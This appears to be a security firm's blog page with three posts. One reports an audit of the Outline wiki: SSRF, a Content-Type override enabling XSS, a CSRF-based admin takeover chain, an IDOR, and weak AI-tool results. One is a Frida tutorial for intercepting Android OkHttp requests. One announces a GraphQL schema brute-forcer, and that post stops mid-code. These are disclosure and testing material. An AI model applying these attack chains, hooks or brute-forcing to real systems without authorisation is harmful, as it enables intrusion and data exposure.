ABOUT US

We are security engineers who break bits and tell stories.

Visit us

doyensec.com

Follow us

@doyensec

Engage us

info@doyensec.com


© 2026 Doyensec LLC

In July 2025, we performed a brief audit of Outline, an OSS wiki similar in many ways to Notion. This activity was meant to evaluate the overall posture of the application and involved two researchers for a total of 60 person-days. In parallel, we thought it would be a valuable firsthand experience to use three AI security platforms to audit the very same codebase. Given that all issues are now fixed, we believe it is worth providing an overview of our effort, along with a few notable findings and considerations.

While this activity was not sufficient to evaluate the entirety of the Outline codebase, we believe we have a good understanding of its quality and resilience. The security posture of the APIs was found to be above industry best practices. Despite our findings, we were pleased to witness a well-thought-out use of security practices and hardening, especially given the numerous functionalities and integrations available.

It is important to note that Doyensec audited only Outline OSS (v0.85.1). On-premise enterprise and cloud functionalities were considered out of scope for this engagement. For instance, multi-tenancy is not supported in the OSS on-prem release, hence authorization testing did not consider cross-tenant privilege escalations. Finally, testing focused on Outline code only, leaving all dependencies out of scope. Ironically, several of the bugs discovered were actually caused by external libraries.

Large Language Models and AI security platforms are evolving at an exceptionally rapid pace. The observations, assessments, and experiences shared in this post reflect our hands-on exposure at a specific point in time and within a particular technical context. As models, tooling, and defensive capabilities continue to mature, some details discussed here may change or become irrelevant.

When performing an in-depth engagement, it is ideal to set up a testing environment with debugging capabilities for both frontend and backend. Outline’s extensive documentation makes this process easy.

We started by setting up a local environment as documented in this guide, and executing the following commands:

echo "127.0.0.1 local.outline.dev" | sudo tee -a /etc/hosts
mkdir files

The following .env file was used for the configuration (non-empty settings only):

NODE_ENV=development
URL=https://local.outline.dev:3000
PORT=3000
SECRET_KEY=09732bbde65d4...989
UTILS_SECRET=af7b3d5a6cc...2f1
DEFAULT_LANGUAGE=en_US
DATABASE_URL=postgres://user:pass@127.0.0.1:5432/outline
REDIS_URL=redis://127.0.0.1:6379
FILE_STORAGE=local
FILE_STORAGE_LOCAL_ROOT_DIR=./files/
FILE_STORAGE_UPLOAD_MAX_SIZE=262144000
FORCE_HTTPS=true
OIDC_CLIENT_ID=web
OIDC_CLIENT_SECRET=secret
OIDC_AUTH_URI=http://127.0.0.1:9998/auth
OIDC_TOKEN_URI=http://127.0.0.1:9998/oauth/token
OIDC_USERINFO_URI=http://127.0.0.1:9998/userinfo
OIDC_DISABLE_REDIRECT=true
OIDC_USERNAME_CLAIM=preferred_username
OIDC_DISPLAY_NAME=OpenID Connect
OIDC_SCOPES=openid profile email
RATE_LIMITER_ENABLED=true

# ––––––––––––– DEBUGGING ––––––––––––
ENABLE_UPDATES=false
DEBUG=http
LOG_LEVEL=debug

Zitadel’s example OIDC server was used for authentication:

REDIRECT_URI=https://local.outline.dev:3000/auth/oidc.callback USERS_FILE=./users.json go run github.com/zitadel/oidc/v3/example/server

Finally, VS Code debugging was set up using the following .vscode/launch.json file:

{
  "version": "0.2.0",
  "configurations": [
    {
      "type": "node",
      "request": "attach",
      "name": "Attach to Outline Backend",
      "address": "localhost",
      "port": 9229,
      "restart": true,
      "protocol": "inspector",
      "skipFiles": ["<node_internals>/**"],
      "cwd": "${workspaceFolder}"
    }
  ]
}

We also facilitated front-end debugging by adding the following setting at the top of the .babelrc file to enable source maps:

"sourceMaps": true

Doyensec researchers discovered and reported seven (7) unique vulnerabilities affecting Outline OSS.

| ID | Title | Class | Severity | Discoverer |
|---|---|---|---|---|
| OUT-Q325-01 | Multiple Blind SSRF | SSRF | Medium | 🤖🙍♂️ |
| OUT-Q325-02 | Vite Path Traversal | Injection Flaws | Low | 🙍♂️ |
| OUT-Q325-03 | CSRF via Sibling Domains | CSRF | Medium | 🙍♂️ |
| OUT-Q325-04 | Local File Storage CSP Bypass | Insecure Design | Low | 🙍♂️ |
| OUT-Q325-05 | Insecure Comparison in VerificationCode | Insufficient Cryptography | Low | 🤖🙍♂️ |
| OUT-Q325-06 | ContentType Bypass | Insecure Design | Medium | 🙍♂️ |
| OUT-Q325-07 | Event Access | IDOR | Low | 🤖 |

Among the bugs we discovered, there are a few that require special mention:

OUT-Q325-01 (GHSA-jfhx-7phw-9gq3) is a standard Server-Side Request Forgery bug that follows redirects but supports only a limited set of protocols. Interestingly, this issue affects only the self-hosted version, as the cloud release is protected by request-filtering-agent. While taking a quick look at this dependency, we realized that versions 1.x.x and earlier contained a vulnerability (GHSA-pw25-c82r-75mm) where HTTPS requests to 127.0.0.1 bypass IP address filtering, while HTTP requests are correctly blocked. Although newer versions of the library were already available, Outline was still using an old release, since no GitHub (or other) advisory had ever been created for this issue. Whether intentionally or accidentally, the fix had shipped silently, with no advisory, for many years.
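To make this bypass class concrete, here is a minimal TypeScript sketch of the kind of destination check a request-filtering agent performs on the resolved IPv4 address, together with a deliberately broken guard that applies it to plain HTTP only. The names isBlockedAddress, vulnerableGuard and fixedGuard are hypothetical. The sketch reproduces the reported behavior (HTTPS to 127.0.0.1 allowed, HTTP blocked), not request-filtering-agent's actual code or root cause, and it ignores IPv6 and DNS rebinding.

```typescript
// Hypothetical sketch: an IPv4 deny-list check of the kind a request-filtering
// agent applies to the *resolved* destination address (IPv6 is ignored here).
interface BlockedRange {
  base: number; // network address as an unsigned 32-bit integer
  prefix: number; // CIDR prefix length
}

// Parse a dotted-quad IPv4 string; returns null for anything malformed.
function ipv4ToInt(ip: string): number | null {
  const parts = ip.split(".");
  if (parts.length !== 4) return null;
  let value = 0;
  for (const part of parts) {
    if (!/^\d{1,3}$/.test(part)) return null;
    const octet = Number(part);
    if (octet > 255) return null;
    value = value * 256 + octet; // plain arithmetic avoids signed bitwise overflow
  }
  return value;
}

function cidr(network: string, prefix: number): BlockedRange {
  const base = ipv4ToInt(network);
  if (base === null) throw new Error("bad network " + network);
  return { base, prefix };
}

const BLOCKED: BlockedRange[] = [
  cidr("0.0.0.0", 8), // "this" network
  cidr("10.0.0.0", 8), // private
  cidr("127.0.0.0", 8), // loopback
  cidr("169.254.0.0", 16), // link-local (includes cloud metadata endpoints)
  cidr("172.16.0.0", 12), // private
  cidr("192.168.0.0", 16), // private
];

function isBlockedAddress(ip: string): boolean {
  const parsed = ipv4ToInt(ip);
  if (parsed === null) return true; // fail closed on unparseable input
  const addr: number = parsed;
  return BLOCKED.some((r) => addr >= r.base && addr < r.base + 2 ** (32 - r.prefix));
}

type Scheme = "http:" | "https:";

// Models the reported behavior: only plain HTTP goes through the filter.
function vulnerableGuard(scheme: Scheme, resolvedIp: string): boolean {
  return scheme === "https:" ? true : !isBlockedAddress(resolvedIp);
}

// Every scheme goes through the same check.
function fixedGuard(_scheme: Scheme, resolvedIp: string): boolean {
  return !isBlockedAddress(resolvedIp);
}

console.log(vulnerableGuard("http:", "127.0.0.1")); // false (blocked)
console.log(vulnerableGuard("https:", "127.0.0.1")); // true (bypass)
console.log(fixedGuard("https:", "127.0.0.1")); // false (blocked)
```

The fixed guard fails closed: anything that does not parse as an IPv4 address is treated as blocked, so a gap in the parser cannot silently turn into an allowed request.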

OUT-Q325-02 (GHSA-pp7p-q8fx-2968) turned out to be a bug in the vite-plugin-static-copy npm module. Luckily, it only affects Outline in development mode.

OUT-Q325-04 (GHSA-gcj7-c9jv-fhgf) had already been exploited in this type confusion attack. In fact, browsers like Chrome and Firefox do not block script execution, even if the script is served with Content-Disposition: attachment, as long as the content type is a valid JavaScript MIME type such as application/javascript. Please note that this issue does not affect the cloud-hosted version, since it does not use the local file storage engine at all.

Investigating this issue led to the discovery of OUT-Q325-06, an even more interesting issue.

Outline allows inline content only for specific (safe) types of files, as defined in server/storage/files/BaseStorage.ts:

/**
 * Returns the content disposition for a given content type.
 *
 * @param contentType The content type
 * @returns The content disposition
 */
public getContentDisposition(contentType?: string) {
  if (!contentType) {
    return "attachment";
  }

  if (
    FileHelper.isAudio(contentType) ||
    FileHelper.isVideo(contentType) ||
    this.safeInlineContentTypes.includes(contentType)
  ) {
    return "inline";
  }

  return "attachment";
}

Despite this logic, the actual Content-Type of the response was being overridden. All Outline versions before v0.84.0 (May 2025) were vulnerable to Cross-Site Scripting because of this issue, which was only accidentally mitigated by adding the following CSP directive:

ctx.set("Content-Security-Policy","sandbox");

Analyzing the root cause, we found it to be an undocumented, insecure behavior of KoaJS.

In Outline, the issue was caused by setting the expected Content-Type before calling response.attachment([filename], [options]):

ctx.set("Content-Type", contentType);
ctx.attachment(fileName, {
  type: forceDownload
    ? "attachment"
    : FileStorage.getContentDisposition(contentType), // this applies the safe allowed-list
});

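In fact, when a filename is provided, attachment() also assigns the response type from the filename's extension (this.type = extname(filename)). This triggers the following setter, which silently overwrites the Content-Type set earlier: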

set type (type) {
  type = getType(type)
  if (type) {
    this.set('Content-Type', type)
  } else {
    this.remove('Content-Type')
  }
},

This insecure behavior is neither documented nor warned against by the framework. Swapping the order of ctx.set and ctx.attachment is sufficient to fix the issue.
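The ordering problem can be reproduced without Koa. The following sketch uses a hypothetical FakeResponse class that mimics only the two behaviors discussed above: attachment(filename) derives the type from the filename extension, and the type setter (modelled here as a setType method) either sets or removes Content-Type. The two-entry extension map stands in for Koa's real MIME lookup, and image/png is assumed, purely for illustration, to be a type the allow-list serves inline.

```typescript
// Hypothetical stand-in for Koa's response object. It reproduces only the two
// behaviors discussed above; the tiny MIME map replaces Koa's real lookup.
const EXT_TO_MIME: Record<string, string> = {
  ".html": "text/html; charset=utf-8",
  ".png": "image/png",
};

class FakeResponse {
  headers: Record<string, string> = {};

  set(name: string, value: string): void {
    this.headers[name.toLowerCase()] = value;
  }

  remove(name: string): void {
    delete this.headers[name.toLowerCase()];
  }

  // Mirrors Koa's `set type` setter: known type -> set it, otherwise remove it.
  setType(ext: string): void {
    const mime = EXT_TO_MIME[ext.toLowerCase()];
    if (mime) this.set("Content-Type", mime);
    else this.remove("Content-Type");
  }

  // Mirrors attachment(): the filename extension silently drives Content-Type.
  attachment(filename: string, options: { type: string }): void {
    if (filename) {
      const dot = filename.lastIndexOf(".");
      this.setType(dot >= 0 ? filename.slice(dot) : "");
    }
    this.set("Content-Disposition", options.type + '; filename="' + filename + '"');
  }
}

// Vulnerable order: the intended type is set first...
function serveVulnerable(res: FakeResponse, fileName: string, contentType: string): void {
  res.set("Content-Type", contentType);
  res.attachment(fileName, { type: "inline" }); // ...and overwritten here
}

// Swapped order: attachment() runs first, then the intended type wins.
function serveFixed(res: FakeResponse, fileName: string, contentType: string): void {
  res.attachment(fileName, { type: "inline" });
  res.set("Content-Type", contentType);
}

const vuln = new FakeResponse();
serveVulnerable(vuln, "payload.html", "image/png");
console.log(vuln.headers["content-type"]); // text/html; charset=utf-8

const fixed = new FakeResponse();
serveFixed(fixed, "payload.html", "image/png");
console.log(fixed.headers["content-type"]); // image/png
```

In the vulnerable order, a file stored as an inline-safe type but named with an .html extension ends up served inline as text/html, which is exactly the combination that enables script execution.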

Combining OUT-Q325-03, OUT-Q325-06, and Outline’s sharing capabilities, it is possible to take over an admin account in the latest version of Outline at the time of testing, as shown in the following video:

Finally, OUT-Q325-07 (GHSA-h9mv-vg9r-8c7c) was discovered autonomously by a security AI platform. The events.list API endpoint contains an IDOR vulnerability allowing users to view events for any actor or document within their team without proper authorization.

router.post(
  "events.list",
  auth(),
  pagination(),
  validate(T.EventsListSchema),
  async (ctx: APIContext<T.EventsListReq>) => {
    const { user } = ctx.state.auth;
    const {
      name,
      events,
      auditLog,
      actorId,
      documentId,
      collectionId,
      sort,
      direction,
    } = ctx.input.body;

    let where: WhereOptions<Event> = {
      teamId: user.teamId,
    };

    if (auditLog) {
      authorize(user, "audit", user.team);
      where.name = events
        ? intersection(EventHelper.AUDIT_EVENTS, events)
        : EventHelper.AUDIT_EVENTS;
    } else {
      where.name = events
        ? intersection(EventHelper.ACTIVITY_EVENTS, events)
        : EventHelper.ACTIVITY_EVENTS;
    }

    if (name && (where.name as string[]).includes(name)) {
      where.name = name;
    }

    if (actorId) {
      where = { ...where, actorId };
    }

    if (documentId) {
      where = { ...where, documentId };
    }

    if (collectionId) {
      where = { ...where, collectionId };
      const collection = await Collection.findByPk(collectionId, {
        userId: user.id,
      });
      authorize(user, "read", collection);
    } else {
      const collectionIds = await user.collectionIds({
        paranoid: false,
      });
      where = {
        ...where,
        [Op.or]: [
          {
            collectionId: collectionIds,
          },
          {
            collectionId: {
              [Op.is]: null,
            },
          },
        ],
      };
    }

    const loadedEvents = await Event.findAll({
      where,
      order: [[sort, direction]],
      include: [
        {
          model: User,
          as: "actor",
          paranoid: false,
        },
      ],
      offset: ctx.state.pagination.offset,
      limit: ctx.state.pagination.limit,
    });

    ctx.body = {
      pagination: ctx.state.pagination,
      data: await Promise.all(
        loadedEvents.map((event) => presentEvent(event, auditLog))
      ),
    };
  }
);

While the code implements team-level isolation (via the teamId check) and collection-level authorization, it fails to validate access to individual events. An attacker can manipulate the actorId or documentId parameters to view events they shouldn’t have access to. This is particularly concerning since audit log events might contain sensitive information (e.g., document titles). This is a nice catch: something not immediately evident to a human auditor without an in-depth understanding of Outline’s authorization model.
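The gap can be illustrated with an in-memory model of the query. In this hypothetical sketch, listEventsVulnerable applies only the team and collection scoping of the handler above, while listEventsFixed additionally drops events tied to documents the viewer cannot read. The readableDocumentIds list stands in for a real per-document policy check; this is one possible mitigation under those assumptions, not Outline's actual patch.

```typescript
// Hypothetical in-memory model of the events.list filter; not Outline code.
interface EventRow {
  id: string;
  teamId: string;
  actorId: string;
  documentId: string | null;
  collectionId: string | null;
}

interface Viewer {
  teamId: string;
  collectionIds: string[]; // collections the viewer may read
  readableDocumentIds: string[]; // stand-in for a per-document policy check
}

interface Filters {
  actorId?: string;
  documentId?: string;
}

// Same scoping as the handler above: team, then collection (or no collection).
function listEventsVulnerable(rows: EventRow[], viewer: Viewer, f: Filters): EventRow[] {
  return rows.filter(
    (e) =>
      e.teamId === viewer.teamId &&
      (e.collectionId === null || viewer.collectionIds.indexOf(e.collectionId) !== -1) &&
      (f.actorId === undefined || e.actorId === f.actorId) &&
      (f.documentId === undefined || e.documentId === f.documentId)
  );
}

// One possible mitigation: drop events tied to documents the viewer cannot read.
function listEventsFixed(rows: EventRow[], viewer: Viewer, f: Filters): EventRow[] {
  return listEventsVulnerable(rows, viewer, f).filter(
    (e) => e.documentId === null || viewer.readableDocumentIds.indexOf(e.documentId) !== -1
  );
}

const rows: EventRow[] = [
  { id: "e1", teamId: "t1", actorId: "alice", documentId: "doc-public", collectionId: "c1" },
  { id: "e2", teamId: "t1", actorId: "bob", documentId: "doc-private", collectionId: null },
  { id: "e3", teamId: "t2", actorId: "eve", documentId: "doc-other", collectionId: "c9" },
];
const viewer: Viewer = { teamId: "t1", collectionIds: ["c1"], readableDocumentIds: ["doc-public"] };

const leakedIds = listEventsVulnerable(rows, viewer, { documentId: "doc-private" }).map((e) => e.id);
console.log(JSON.stringify(leakedIds)); // ["e2"]
const fixedIds = listEventsFixed(rows, viewer, { documentId: "doc-private" }).map((e) => e.id);
console.log(JSON.stringify(fixedIds)); // []
```

Team and collection scoping alone still return e2, because an event with no collection passes the collection filter regardless of whether the viewer can read its document.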

Despite the discovery of OUT-Q325-07, our experience using three AI security platforms was, overall, rather disappointing. LLM-based models can identify some vulnerabilities; however, false positives vastly outnumbered the few true positives. What made this especially problematic was how convincing the findings were: the descriptions of the alleged issues were often extremely accurate and well-articulated, making it surprisingly hard to confidently dismiss them as false positives. As a result, cleaning up and validating all AI-reported issues turned into a 40-hour effort.

Such overhead during a paid manual audit is hard to justify for us and, more importantly, for our clients. AI hallucinations repeatedly sent us down unexpected rabbit holes, at times making seasoned consultants, with decades of combined experience, feel like complete newbies. While attempting to validate alleged bugs reported by AI, we found ourselves second-guessing our own judgment, losing valuable time that could have been spent on higher-impact tasks.

While the future undoubtedly involves LLMs, it is not quite here yet for high-quality security engagements targeting popular, well-audited software. At Doyensec, we will continue to explore and experiment with AI-assisted tooling, adopting it when and where it actually adds value. We don’t want to be remembered as anti-AI hypers, but we’re equally not interested in outsourcing our expertise to confident-sounding hallucinations. For now, human intuition, experience, and skepticism, combined with top-notch tooling, remain very hard to beat. Challenge us!

OkHttp is the de facto standard HTTP client library for the Android ecosystem. It is therefore crucial for a security analyst to be able to dynamically eavesdrop on the traffic generated by this library during testing. While it might seem easy, this task is far from trivial. Every request goes through a series of mutations between its initial creation and the moment it is transmitted. Therefore, a single injection point might not be enough to get a full picture: one injection point is needed to see what actually goes over the wire, while another might be required to understand the initial payload being sent.

In this tutorial we will demonstrate the architecture and the most interesting injection points that can be used to eavesdrop and modify OkHttp requests.

For the purpose of demonstration, I built a simple APK with a flow similar to the app I recently tested. It first creates a Request with a JSON payload. Then, a couple of interceptors perform the following operations:

Looking at this flow, it becomes clear why reversing the actual application protocol isn’t straightforward. Intercepting requests at the moment they are sent will reveal the payload that actually goes over the wire, but by then the JSON payload is already obscured. Intercepting the request creation, on the other hand, will reveal the JSON payload, but not the custom HTTP headers or the authentication token, nor will it allow replaying the request.

In the following examples, I’ll demonstrate two approaches that can be mixed and matched for a full picture. First, I will hook the RealCall functions and dump the Request from there. Then, I will demonstrate how to follow the consecutive Request mutations done by the Interceptors. However, in real-life scenarios, hooking every Interceptor implementation might be impractical, especially in obfuscated applications. Instead, I’ll demonstrate how to observe the intercept results from the internal RealInterceptorChain.proceed function.

To reliably print the contents of the requests, one needs to prepare the helper functions first. Assuming we have an okhttp3.Request object available, we can use Frida to dump its contents:

function dumpRequest(req, function_name) {
  try {
    console.log("\n=== " + function_name + " ===");
    console.log("method: " + req.method());
    console.log("url: " + req.url().toString());
    console.log("-- headers --");
    dumpHeaders(req);
    dumpBody(req);
    console.log("=== END ===\n");
  } catch (e) {
    console.log("dumpRequest failed: " + e);
  }
}

Dumping headers requires iterating through the Headers collection:

function dumpHeaders(req) {
  const headers = req.headers();
  try {
    if (!headers) return;
    const n = headers.size();
    for (let i = 0; i < n; i++) {
      console.log(headers.name(i) + ": " + headers.value(i));
    }
  } catch (e) {
    console.log("dumpHeaders failed: " + e);
  }
}

Dumping the body is the hardest task, as there might be many different RequestBody implementations. However, in practice the following should usually work:

function dumpBody(req) {
  const body = req.body();
  if (body) {
    const ct = body.contentType();
    console.log("-- body meta --");
    console.log("contentType: " + (ct ? ct.toString() : "(null)"));
    try {
      console.log("contentLength: " + body.contentLength());
    } catch (_) {
      console.log("contentLength: (unknown)");
    }
    const utf8 = readBodyToUtf8(body);
    if (utf8 !== null) {
      console.log("-- body (utf8) --");
      console.log(utf8);
    } else {
      console.log("-- body -- (not readable: streaming/one-shot/duplex or custom)");
    }
  } else {
    console.log("-- no body --");
  }
}

The code above uses another helper function to read the actual bytes from the body and decode them as UTF-8. It does so by writing the body into an okio.Buffer instance:

function readBodyToUtf8(reqBody) {
  try {
    if (!reqBody) return null;
    const Buffer = Java.use("okio.Buffer");
    const buf = Buffer.$new();
    reqBody.writeTo(buf);
    const out = buf.readUtf8();
    return out;
  } catch (e) {
    return null;
  }
}

Now that we have code capable of dumping the request as text, we need to find a reliable way to catch the requests. When attempting to view outgoing communication, the first instinct is to hook the function called to send the request. In the world of OkHttp, the closest functions are RealCall.execute() and RealCall.enqueue():

Java.perform(function () {
  // Non-obfuscated OkHttp RealCall class (obfuscated apps need the renamed class)
  const RealCall = Java.use("okhttp3.internal.connection.RealCall");

  try {
    // Keep a reference to the overload itself so the original can be called;
    // chaining "= ... .implementation = function" would recurse forever.
    const execOv = RealCall.execute.overload();
    execOv.implementation = function () {
      dumpRequest(this.request(), "RealCall.execute() about to send");
      return execOv.call(this);
    };
    console.log("[+] Hooked RealCall.execute()");
  } catch (e) {
    console.log("[-] Failed to hook RealCall.execute(): " + e);
  }

  try {
    const enqOv = RealCall.enqueue.overload("okhttp3.Callback");
    enqOv.implementation = function (cb) {
      dumpRequest(this.request(), "RealCall.enqueue()");
      return enqOv.call(this, cb);
    };
    console.log("[+] Hooked RealCall.enqueue(Callback)");
  } catch (e) {
    console.log("[-] Failed to hook RealCall.enqueue(): " + e);
  }
});

However, after running these hooks, it becomes clear that this approach is insufficient whenever an application uses interceptors:

frida -U -p $(adb shell pidof com.doyensec.myapplication) -l blogpost/request-body.js
     ____
    / _  |   Frida 17.5.1 - A world-class dynamic instrumentation toolkit
   | (_| |
    > _  |   Commands:
   /_/ |_|       help      -> Displays the help system
   . . . .       object?   -> Display information about 'object'
   . . . .       exit/quit -> Exit
   . . . .
   . . . .   More info at https://frida.re/docs/home/
   . . . .
   . . . .   Connected to CPH2691 (id=8c5ca5b0)
Attaching...
[+] Using okhttp3.internal.connection.RealCall
[+] Hooked RealCall.execute()
[+] Hooked RealCall.enqueue(Callback)
[*] Non-obfuscated RealCall hooks installed.
[CPH2691::PID::9358 ]->
=== RealCall.enqueue() about to send ===
method: POST
url: https://tellico.fun/endpoint
-- headers --
-- body meta --
contentType: application/json; charset=utf-8
contentLength: 60
-- body (utf8) --
{
  "hello": "world",
  "poc": true,
  "ts": 1768598890661
}
=== END ===

As can be observed, this approach was useful to disclose the address and the JSON payload. However, the request is far from complete. The custom and authentication headers are missing, and the analyst cannot observe that the payload is later encrypted, making it impossible to infer the full application protocol. Therefore, we need to find a more comprehensive method.

Since the modifications are performed inside the OkHttp Interceptors, our next injection target will be the okhttp3.internal.http.RealInterceptorChain class. Given that this is an internal class, it’s bound to be less stable than the public OkHttp API. Therefore, instead of hooking a method with a single signature, we’ll iterate over all overloads of RealInterceptorChain.proceed:

const Chain = Java.use("okhttp3.internal.http.RealInterceptorChain");
console.log("[+] Found okhttp3.internal.http.RealInterceptorChain");

if (Chain.proceed) {
  const ovs = Chain.proceed.overloads;
  for (let i = 0; i < ovs.length; i++) {
    const proceed_overload = ovs[i];
    console.log("[*] Hooking RealInterceptorChain.proceed overload: " + proceed_overload.argumentTypes.map(t => t.className).join(", "));
    proceed_overload.implementation = function () {
      // implementation override here
    };
  }
  console.log("[+] Hooked RealInterceptorChain.proceed(*)");
} else {
  console.log("[-] RealInterceptorChain.proceed not found (unexpected)");
}

To write the implementation, we need to understand how the proceed functions work. The RealInterceptorChain class maintains the entire chain. When proceed is called by the library (or by the previous Interceptor), the chain invokes the Interceptor at position this.index, handing it a copy of the chain whose index is incremented by one. Therefore, at the moment of the proceed call, the Request is in the state produced by the previous Interceptor. So, in order to attribute each Request state to the right Interceptor, we need the name of the Interceptor at position index - 1:

proceed_overload.implementation = function () {
  // First arg is Request in all proceed overloads.
  const req = arguments[0];

  // Get current index
  const idx = this.index.value;

  // Get previous interceptor name
  // Previous interceptor is the one responsible for the current req state
  let interceptorName = "";
  if (idx === 0) {
    interceptorName = "Original request";
  } else {
    interceptorName = "Interceptor " + this.interceptors.value.get(idx - 1).getClass().getName();
  }

  dumpRequest(req, interceptorName);

  // Call the actual proceed
  return proceed_overload.apply(this, arguments);
};

The example result will look similar to the following:

[*] Hooking RealInterceptorChain.proceed overload: okhttp3.Request
[+] Hooked RealInterceptorChain.proceed(*)
[+] Hooked okhttp3.Interceptor.intercept(Chain)
[*] RealCall hooks installed.
[CPH2691::PID::19185 ]->
=== RealCall.enqueue() ===
method: POST
url: https://tellico.fun/endpoint
-- headers --
-- body meta --
contentType: application/json; charset=utf-8
contentLength: 60
-- body (utf8) --
{
  "hello": "world",
  "poc": true,
  "ts": 1768677868986
}
=== END ===

=== Original request ===
method: POST
url: https://tellico.fun/endpoint
-- headers --
-- body meta --
contentType: application/json; charset=utf-8
contentLength: 60
-- body (utf8) --
{
  "hello": "world",
  "poc": true,
  "ts": 1768677868986
}
=== END ===

=== Interceptor com.doyensec.myapplication.MainActivity$HeaderInterceptor ===
method: POST
url: https://tellico.fun/endpoint
-- headers --
X-PoC: frida-test
X-Device: android
Content-Type: application/json
-- body meta --
contentType: application/json; charset=utf-8
contentLength: 60
-- body (utf8) --
{
  "hello": "world",
  "poc": true,
  "ts": 1768677868986
}
=== END ===

=== Interceptor com.doyensec.myapplication.MainActivity$SignatureInterceptor ===
method: POST
url: https://tellico.fun/endpoint
-- headers --
X-PoC: frida-test
X-Device: android
Content-Type: application/json
X-Signature: 736c014442c5eebe822c1e2ecdb97c5d
-- body meta --
contentType: application/json; charset=utf-8
contentLength: 60
-- body (utf8) --
{
  "hello": "world",
  "poc": true,
  "ts": 1768677868986
}
=== END ===

=== Interceptor com.doyensec.myapplication.MainActivity$EncryptBodyInterceptor ===
method: POST
url: https://tellico.fun/endpoint
-- headers --
X-PoC: frida-test
X-Device: android
Content-Type: application/json
X-Signature: 736c014442c5eebe822c1e2ecdb97c5d
X-Content-Encryption: AES-256-GCM
X-Content-Format: base64(iv+ciphertext+tag)
-- body meta --
contentType: application/octet-stream
contentLength: 120
-- body (utf8) --
YIREhdesuf1VdvxeCO+H/8/N8NYFJ2r5Jk4Im40fjyzVI2rzufpejFOHQ67hkL8UFdniknpABmjoP73F2Z4Vbz3sPAxOp7ZXaz5jWLlk3T6B5sm2QCAjKA==
=== END ===
...

With such output, we can easily observe the consecutive mutations of the request: the initial payload, the custom headers being added, the X-Signature being added and, finally, the payload encryption. With the proper Interceptor names, an analyst also receives strong signals as to which classes to target in order to reverse-engineer these operations.
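The index - 1 bookkeeping used in the hook can be sanity-checked against a toy model. The TypeScript sketch below is a simplified, hypothetical re-implementation of the chain mechanics (not OkHttp code): proceed() runs the interceptor at index with a copy of the chain advanced by one, and logs each request under the name of the interceptor at index - 1. The header names are borrowed from the sample output, the signature value is a placeholder, and the terminal Network interceptor stands in for OkHttp's own network-facing interceptors.

```typescript
// Simplified, hypothetical model of OkHttp's interceptor chain (not OkHttp code).
interface Req {
  headers: Record<string, string>;
  body: string;
}

interface Interceptor {
  name: string;
  intercept(chain: Chain): string; // returns a fake "response"
}

class Chain {
  constructor(
    readonly interceptors: Interceptor[],
    readonly index: number,
    readonly request: Req,
    readonly log: string[]
  ) {}

  proceed(request: Req): string {
    // Same attribution rule as the Frida hook: this request state was produced
    // by the interceptor at index - 1 (or is the original request at index 0).
    const producer = this.index === 0 ? "Original request" : this.interceptors[this.index - 1].name;
    this.log.push(producer + ": " + JSON.stringify(request.headers));
    // Hand the request to the interceptor at `index`, with a chain advanced by one.
    const next = new Chain(this.interceptors, this.index + 1, request, this.log);
    return this.interceptors[this.index].intercept(next);
  }
}

// Interceptor that adds one header and passes the new request down the chain.
function addHeader(name: string, key: string, value: string): Interceptor {
  return {
    name,
    intercept(chain: Chain): string {
      const headers: Record<string, string> = { ...chain.request.headers };
      headers[key] = value;
      return chain.proceed({ headers, body: chain.request.body });
    },
  };
}

// Terminal interceptor: answers without calling proceed(), like a network call.
const network: Interceptor = { name: "Network", intercept: () => "200 OK" };

const trace: string[] = [];
const interceptors = [
  addHeader("HeaderInterceptor", "X-PoC", "frida-test"),
  addHeader("SignatureInterceptor", "X-Signature", "sig"),
  network,
];
const original: Req = { headers: {}, body: '{"hello":"world"}' };
const response = new Chain(interceptors, 0, original, trace).proceed(original);

trace.forEach((line) => console.log(line));
// Original request: {}
// HeaderInterceptor: {"X-PoC":"frida-test"}
// SignatureInterceptor: {"X-PoC":"frida-test","X-Signature":"sig"}
```

Each log line carries the headers added by exactly the interceptor it is attributed to, which is the property the Frida hook relies on.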

In this post we walked through a practical approach to dynamically intercept OkHttp traffic using Frida.

We started by instrumenting RealCall.execute() and RealCall.enqueue(), which gives quick visibility into endpoints and plaintext request bodies. While useful, this approach quickly falls short once applications rely on OkHttp interceptors to add authentication headers, calculate signatures, or encrypt payloads.

By moving one level deeper and hooking RealInterceptorChain.proceed(), we were able to observe the request as it evolves through each interceptor in the chain. This allowed us to reconstruct the full application protocol step by step, from the original JSON payload, through header enrichment and signing, all the way to the final encrypted body sent over the wire.

This technique is especially useful during security assessments, where understanding how a request is built is often more important than simply seeing the final bytes on the network. Mapping concrete request mutations back to specific interceptor classes also provides clear entry points for reverse-engineering custom cryptography, signatures, or authorization logic.

In short, when dealing with modern Android applications, intercepting OkHttp at a single point is rarely sufficient. Combining multiple injection points, and in particular leveraging the interceptor chain, provides the visibility needed to fully understand and manipulate application-level protocols.

We are excited to announce a new release of our Burp Suite extension: InQL v6.1.0! The complete rewrite from Jython to Kotlin in our previous update (v6.0.0) laid the groundwork for us to start implementing powerful new features, and this update delivers the first exciting batch.

This new version introduces key features like our new GraphQL schema brute-forcer (which abuses “did you mean…” suggestions), server engine fingerprinter, automatic variable generation when sending requests to Repeater/Intruder, and various other quality-of-life and performance improvements.

Until now, InQL was most helpful when a server had introspection enabled or when you already had the GraphQL schema file. With v6.1.0, the tool can now attempt to reconstruct the backend schema by abusing the “did you mean…” suggestions supported by many GraphQL server implementations.

This feature was inspired by the excellent Clairvoyance CLI tool. We implemented a similar algorithm, also based on regular expressions and batch queries. Building this directly into InQL brings it one step closer to being the all-in-one Swiss Army knife for GraphQL security testing, allowing researchers to access every tool they need in one place.

How It Works

When InQL fails to fetch a schema because introspection is disabled, you can now choose to “Launch schema bruteforcer”. The tool will then start sending hundreds of batched queries containing field and argument names guessed from a wordlist.

InQL then analyzes the server’s error messages, looking for specific errors like Argument 'contribution' is required or Field 'bugs' not found on type 'inql'. It also parses helpful suggestions, such as Did you mean 'openPR'?, which greatly speed up discovery. At the same time, it probes the types of discovered fields and arguments (like String, User, or [Episode!]) by intentionally triggering type-specific error messages.

This process repeats until the entire reachable schema is mapped out. The result is a reconstructed schema, built piece-by-piece from the server’s own validation feedback. All without introspection.
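The core of this feedback loop can be sketched in a few lines. This TypeScript example is a hypothetical, simplified model of the regex-driven approach, not InQL's or Clairvoyance's code: buildProbe packs candidate words into one query, and parseErrors extracts missing fields, required arguments, and suggestions from error messages shaped like the examples quoted above. Real engines phrase these errors differently, so a practical tool needs engine-specific patterns.

```typescript
// Hypothetical sketch of the regex-driven feedback loop; not InQL or Clairvoyance code.

// Pack many candidate field names from a wordlist into a single probe query.
function buildProbe(candidates: string[]): string {
  return "query { " + candidates.join(" ") + " }";
}

interface Feedback {
  missingFields: string[];
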